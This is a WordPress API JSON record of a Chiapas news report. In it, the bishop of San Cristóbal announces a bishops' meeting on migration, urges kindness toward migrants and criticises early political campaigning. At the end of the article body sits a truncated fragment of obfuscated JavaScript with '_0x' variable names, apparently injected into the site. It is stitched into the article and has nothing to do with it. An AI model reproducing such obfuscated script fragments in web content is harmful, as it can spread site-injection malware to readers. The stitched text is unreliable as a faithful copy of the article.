{"id":11427,"date":"2023-08-21T03:28:22","date_gmt":"2023-08-21T03:28:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11427"},"modified":"2023-08-21T03:28:23","modified_gmt":"2023-08-21T03:28:23","slug":"obispos-de-mexico-participaran-en-un-encuentro-para-abundar-el-tema-de-emigracion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11427","title":{"rendered":"Obispos de M\u00e9xico participar\u00e1n en un encuentro para abundar el tema de emigraci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"863\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-20-at-2.36.08-PM-1024x863.jpeg\" alt=\"\" class=\"wp-image-11429\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-20-at-2.36.08-PM-1024x863.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-20-at-2.36.08-PM-300x253.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-20-at-2.36.08-PM-768x647.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-20-at-2.36.08-PM.jpeg 1256w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>20 de Agosto del 2023.;San Crist\u00f3bal de Las Casas.- El obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez, inform\u00f3 que esta semana viajar\u00e1 al Salvador, a una reuni\u00f3n de Obispos de Canad\u00e1, Estados Unidos, M\u00e9xico y Centroam\u00e9rica, donde abordar\u00e1n temas de la problem\u00e1tica de la Emigraci\u00f3n M\u00faltiple \u201cque nos afecta, pero que hay m\u00faltiples que nos afecta pero que hay muchos otros pa\u00edses que est\u00e1n implicados, que exportan migrantes o que reciben migrantes\u201d.<\/p>\n\n\n\n<p>En entrevista al finalizar la misa dominical de mediod\u00eda, precis\u00f3 que a la di\u00f3cesis de San Crist\u00f3bal, reciben centroamericanos y de otros pa\u00edses como \u00c1frica y de las Islas del Caribe, y la gente de M\u00e9xico y Chiapas, emigra a otros pa\u00edses buscando otro mejor lugar de trabajo o un hogar con todos los riesgos que implica, y es por eso que abundar\u00e1n ese tema.<\/p>\n\n\n\n<p>\u201cEstemos atentos, a ser comprensivo y ayudar al menos siendo amables con los migrantes, no rechaz\u00e1ndolos, si pueden ver algunos migrantes malvados, por ejemplo las maras de El salvador, pero hay muchos otros que est\u00e1n necesitados, y que seamos comprensivos y generosos con ellos\u201d, mencion\u00f3.<\/p>\n\n\n\n<p>Aguilar Mart\u00ednez anunci\u00f3 la jornada Diocesano de la Juventud que se realizar\u00e1 del viernes 25 al domingo 27 en el teatro de la Ciudad de San Crist\u00f3bal, que terminar\u00e1 con una misa eucar\u00edstica a las 10 de la ma\u00f1ana en La Catedral de esta ciudad, evento que ser\u00e1 coordinado por la Pastoral Juvenil, algunos sacerdotes y j\u00f3venes, y son temas que se abunda en la Jornada Mundial de la Juventud.<\/p>\n\n\n\n<p>Calific\u00f3 de actos adelantados de campa\u00f1a, todas las actividades que est\u00e1n haciendo los aspirantes a coordinador de los comit\u00e9s de defensa de la Cuarta Transformaci\u00f3n que est\u00e1n en giras en varios estados de la rep\u00fablica, por lo que pidi\u00f3 a la ciudadan\u00eda ser reflexivo participando para buscar el bien com\u00fan \u201cveamos atentos a examinar los candidatos de las diversas agrupaciones qu\u00e9 proponen, cu\u00e1l es el que nos convienen m\u00e1s\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 20 de Agosto del 2023.;San Crist\u00f3bal de Las Casas.- El obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez, inform\u00f3 que esta semana viajar\u00e1 al Salvador, a una reuni\u00f3n de Obispos de Canad\u00e1, Estados Unidos, M\u00e9xico y Centroam\u00e9rica, donde abordar\u00e1n temas de la problem\u00e1tica de la Emigraci\u00f3n M\u00faltiple \u201cque nos afecta, pero &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11429,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11427","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11427"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11427\/revisions"}],"predecessor-version":[{"id":11430,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11427\/revisions\/11430"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11429"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}